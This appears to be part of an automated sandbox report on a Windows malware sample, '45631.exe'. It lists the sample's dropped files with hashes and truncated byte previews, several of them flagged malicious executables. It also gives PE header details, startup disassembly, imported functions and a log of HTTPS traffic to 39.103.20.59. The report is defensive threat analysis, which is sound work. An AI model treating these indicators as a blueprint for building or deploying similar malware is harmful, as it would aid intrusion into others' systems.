                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):3892010
                    Entropy (8bit):7.995495589600101
                    Encrypted:true
                    SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                    MD5:E4E46F3980A9D799B1BD7FC408F488A3
                    SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                    SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                    SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                    Malicious:false
                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):5.210952677725515
                    Encrypted:false
                    SSDEEP:12:Li4qkPIfdduXCCOEMBIDRzflcjmgUzWg3:u4yduxOEvNrlAuzWU
                    MD5:2CAD33745064F8D09878A5E2E439F0F8
                    SHA1:8EC79EB46C5025828DAD12A780A4A813A3D1305F
                    SHA-256:4388E9177C40CC591CD3BA7421E15CC086CCABF3524E9DA3810362F9100419B1
                    SHA-512:97ADDD833F1EDAD6E931DA4B8586EF173962868B1D8091A993B08D8CBA535D8A8B9E8C2E3498D8F8E6974E1DBD7B70F129F1E9A175997842DD9BD9A733A43972
                    Malicious:false
                    Preview:....l%00BI.Y1*w6EE.U;x70YZY^9p?2[KG\?/r?PR.^p97888888888888888888888888888888888PLLH;rgg..U.f} a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33AJ.Z2)t5FF.V8{43ZYZ]:s<1XHD_<,q<SQ._q86999999999999999999999999999999999QMMI:sff..T.g|!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):3889557
                    Entropy (8bit):7.999938753108991
                    Encrypted:true
                    SSDEEP:98304:aAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:5ndLOZS/DtpPJRO8OHBL4f2UQI+A
                    MD5:75A6340ACF9926E6BFA66C4A2882EE38
                    SHA1:06523A91A356E4A7C183CA2C218323C8F7F579EA
                    SHA-256:EAAFCF867EB8553BB3315BD9D612C6976CE2C1828F9DC4A87153615D8DA32B83
                    SHA-512:FA9A456F9600E653B8F9B59D848FD5CF31F461C5DC1418915AD5ED0B0EEE69B4F1336495623F2F7E15D089159C0FC9E511B5C9222133888B0CE0DCBC229678F9
                    Malicious:false
                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.QU.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:GIF image data, version 89a, 10 x 10
                    Category:dropped
                    Size (bytes):8228
                    Entropy (8bit):7.979001655024448
                    Encrypted:false
                    SSDEEP:192:3Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:3BuNhyTlBU2dp+1XrBuCgp9vU0l
                    MD5:E0866E74249D8BCF0DC4817F02D8AEE4
                    SHA1:71BFC42D672D4FBE7888CE54785212AC46F72599
                    SHA-256:DF05B42B4BA2542566F1AE81B8097898C77E0C9B9799D08BF04C45A9E265055A
                    SHA-512:C79DC3996FA6A655BA0CD8E2D76BA2CB739C695CEC038D64D2495C373205F5A9A1E1C37D82468B94659456D931E47F8EA3B3B294BB0F6A2172E0C8E7233129BC
                    Malicious:false
                    Preview:GIF89a.......,.j.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):133136
                    Entropy (8bit):6.350273548571922
                    Encrypted:false
                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Joe Sandbox View:
                    • Filename: 0000000000000000.exe, Detection: malicious, Browse
                    • Filename: 0000000000000000.exe, Detection: malicious, Browse
                    • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):122880
                    Entropy (8bit):6.002066982909403
                    Encrypted:false
                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FD:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gD
                    MD5:8164F78F89F615527BF28D3D48A2998D
                    SHA1:B9DE2CD48BB0FA5D306301D9623CBEA0D0619D13
                    SHA-256:31DC082CE8B98901E3761EBC1B86F253A63A06219711357B0BABC6873C4FECF4
                    SHA-512:45FD1F8F832F5A03E1D426DE016B1C64462B7D9BEC56B60DDBC2BABD05DD829463EEF3398F1C5CF9CF98A3AEEB02E55863AC79814DF1A02207B9A383025896F0
                    Malicious:true
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\45631.exe
                    File Type:PE32+ executable (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):28272
                    Entropy (8bit):6.228933463838662
                    Encrypted:false
                    SSDEEP:384:S3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/H:SOUkgfdZ9pRyv+uPzCMHo3q4tDghR
                    MD5:A51B38CABA30B2F07300E4197F9952B7
                    SHA1:85A8DD5E866BC90CD5653734C37871E059A60C98
                    SHA-256:D7412FD41FC5CD0EF3E091DB78B211CBF1025D2E6E25057447232F26EEB8921A
                    SHA-512:E3B338F3F8548C0A0D83C88F5C5C2FB51A65E026D7D2160536B0DF13FDF46EEE4D3749AFE1695225497FA53AC74A917CD6194F3711EA795F2F43D1820091807A
                    Malicious:true
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................r..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                    Entropy (8bit):2.6383083899317192
                    TrID:
                    • Win64 Executable GUI (202006/5) 92.65%
                    • Win64 Executable (generic) (12005/4) 5.51%
                    • Generic Win/DOS Executable (2004/3) 0.92%
                    • DOS Executable Generic (2002/1) 0.92%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:45631.exe
                    File size:31'614'976 bytes
                    MD5:71fb431d4793bb51ce762dc5d719a730
                    SHA1:39fcda8ec8c9e472e2c133cf767e1a4b5a00d01f
                    SHA256:01c7b434e25b639bed532929cfeac6b4da4d7e9a07cdd0e9f3c93573191865e5
                    SHA512:a280449d7d5955805ae33fb03f927501b508c4fcdfc9e9216d8d4d0c3cd1c378d142533b180f0f09c2cd1addce8b944d22e03c6b89fcdf2ca2ee1338bfa09d6f
                    SSDEEP:3072:CTZr7Qctp6GVx9UpYDCu3j2I1lyXDGD04X6VitI37ot28feHxKaiI7ThJKX39/UB:Cd7Qcu69zDCA2wx7tI3428fex
                    TLSH:EC67643E545E122B87F9E729D5DD1A0BF090A59B36427C0EE8D713858A1B783BDC123E
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x-...~...~...~."k~...~."x~...~."{~...~...~...~...~...~."d~...~."j~...~."n~...~Rich...~........................PE..d...%5mX...
                    Icon Hash:1ed1f1f1e1e93c03
                    Entrypoint:0x1400046b0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x140000000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x586D3525 [Wed Jan 4 17:47:17 2017 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:bc775a76f703b07adc865091a82ee39c
                    Instruction
                    dec eax
                    sub esp, 28h
                    call 00007F3BA4ED73BCh
                    dec eax
                    add esp, 28h
                    jmp 00007F3BA4ED194Bh
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    dec eax
                    mov dword ptr [esp+08h], ecx
                    dec eax
                    sub esp, 00000088h
                    dec eax
                    lea ecx, dword ptr [0000AABDh]
                    call dword ptr [0000699Fh]
                    dec eax
                    mov eax, dword ptr [0000ABA8h]
                    dec eax
                    mov dword ptr [esp+58h], eax
                    inc ebp
                    xor eax, eax
                    dec eax
                    lea edx, dword ptr [esp+60h]
                    dec eax
                    mov ecx, dword ptr [esp+58h]
                    call 00007F3BA4EDB630h
                    dec eax
                    mov dword ptr [esp+50h], eax
                    dec eax
                    cmp dword ptr [esp+50h], 00000000h
                    je 00007F3BA4ED4F83h
                    dec eax
                    mov dword ptr [esp+38h], 00000000h
                    dec eax
                    lea eax, dword ptr [esp+48h]
                    dec eax
                    mov dword ptr [esp+30h], eax
                    dec eax
                    lea eax, dword ptr [esp+40h]
                    dec eax
                    mov dword ptr [esp+28h], eax
                    dec eax
                    lea eax, dword ptr [0000AA68h]
                    dec eax
                    mov dword ptr [esp+20h], eax
                    dec esp
                    mov ecx, dword ptr [esp+50h]
                    dec esp
                    mov eax, dword ptr [esp+58h]
                    dec eax
                    mov edx, dword ptr [esp+60h]
                    xor ecx, ecx
                    call 00007F3BA4EDB5DEh
                    jmp 00007F3BA4ED4F64h
                    dec eax
                    mov eax, dword ptr [esp+00000088h]
                    dec eax
                    mov dword ptr [0000AB34h], eax
                    dec eax
                    lea eax, dword ptr [esp+00000088h]
                    dec eax
                    add eax, 08h
                    dec eax
                    mov dword ptr [0000AAC1h], eax
                    Programming Language:
                    • [ASM] VS2005 build 50727
                    • [C++] VS2005 build 50727
                    • [ C ] VS2005 build 50727
                    • [IMP] VS2008 SP1 build 30729
                    • [RES] VS2005 build 50727
                    • [LNK] VS2005 build 50727
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xce480x50.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e0000xcd0c.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x75c.pdata
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb2900x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0xb0000x238.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x9e5e0xa000d9633e0e6bbdc62fabd022d8ee71c353False0.4929443359375data5.82270589751864IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0xb0000x25d00x26002c131bac2dafc709cf96cd53b4e3007fFalse0.4009046052631579data5.38726836540401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xe0000xe2400xc800badac5ea6a137a49d77b6ff1d824af6fFalse0.855234375data7.591063161216864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .pdata0x1d0000x75c0x800a45f6f9c628e055fcff9592e603bf201False0.4697265625data4.196043641178827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x1e0000xcd0c0xce002974a26962f85b85a530007f73a836d0False0.5054801274271845data5.467811993857623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0x1e4900x668Device independent bitmap graphic, 48 x 96 x 4, image size 0GermanGermany0.39146341463414636
                    RT_ICON0x1eaf80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0GermanGermany0.4771505376344086
                    RT_ICON0x1ede00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0GermanGermany0.5405405405405406
                    RT_ICON0x1ef080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GermanGermany0.4522921108742004
                    RT_ICON0x1fdb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GermanGermany0.463898916967509
                    RT_ICON0x206580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GermanGermany0.45809248554913296
                    RT_ICON0x20bc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.5409751037344398
                    RT_ICON0x231680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.6393058161350844
                    RT_ICON0x242100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.5638297872340425
                    RT_ICON0x246780x668Device independent bitmap graphic, 48 x 96 x 4, image size 0GermanGermany0.37621951219512195
                    RT_ICON0x24ce00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0GermanGermany0.47580645161290325
                    RT_ICON0x24fc80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0GermanGermany0.4831081081081081
                    RT_ICON0x250f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GermanGermany0.5093283582089553
                    RT_ICON0x25f980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GermanGermany0.572202166064982
                    RT_ICON0x268400x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GermanGermany0.47471098265895956
                    RT_ICON0x26da80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.508609958506224
                    RT_ICON0x293500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.6285178236397748
                    RT_ICON0x2a3f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.500886524822695
                    RT_GROUP_ICON0x2a8600x84dataGermanGermany0.6363636363636364
                    RT_GROUP_ICON0x2a8e40x84dataGermanGermany0.6363636363636364
                    RT_VERSION0x2a9680x34cdataGermanGermany0.471563981042654
                    RT_MANIFEST0x2acb40x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884
                    DLLImport
                    ADVAPI32.dllRegCreateKeyExW, RegSetValueExW, RegCloseKey, RegOpenKeyExW
                    SHELL32.dllShellExecuteW
                    KERNEL32.dllHeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetProcAddress, GetModuleHandleA, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, RtlUnwindEx, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, GetEnvironmentStrings, FreeEnvironmentStringsW, GetLastError, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, FlsGetValue, FlsSetValue, TlsFree, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSection, Sleep, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, HeapReAlloc, GetStringTypeA, GetStringTypeW, LCMapStringA, VirtualAlloc
                    Language of compilation systemCountry where language is spokenMap
                    GermanGermany
                    EnglishUnited States
                    TimestampSource PortDest PortSource IPDest IP
                    Jan 2, 2025 12:08:29.475805044 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:29.475852966 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:29.475970984 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:29.485384941 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:29.485399008 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:30.763693094 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:30.763837099 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:30.764453888 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:30.764513016 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:30.811428070 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:30.811455011 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:30.811810970 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:30.811878920 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:30.815226078 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:30.855369091 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:31.153670073 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:31.153747082 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:31.153819084 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:31.159928083 CET49975443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:31.159948111 CET4434997539.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:31.255363941 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:31.255392075 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:31.255471945 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:31.255678892 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:31.255691051 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.462585926 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.462805986 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.482527018 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.482549906 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.482734919 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.482739925 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.792232037 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.792258978 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.792318106 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.792344093 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.792357922 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.792401075 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.792480946 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.792540073 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.793797016 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.793853998 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.795701981 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.795789957 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.878302097 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.878396034 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.878422022 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.878473997 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.879087925 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.879148006 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.879920006 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.879977942 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.879990101 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.880043983 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.880888939 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.880979061 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.881488085 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.881541967 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.882065058 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.882114887 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.928463936 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.928535938 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.964376926 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.964437008 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.964551926 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.964551926 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.964560032 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.964600086 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.964740038 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.964790106 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.965138912 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.965183973 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.965188026 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.965193033 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.965229034 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.965248108 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.965931892 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.965981007 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.966120005 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.966170073 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.966187000 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.966233015 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.966917038 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.966969967 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.967067957 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.967120886 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.967573881 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.967626095 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.967787027 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.967842102 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.968502045 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.968553066 CET49976443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:32.968775034 CET4434997639.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:32.968821049 CET49976443192.168.2.539.103.20.59
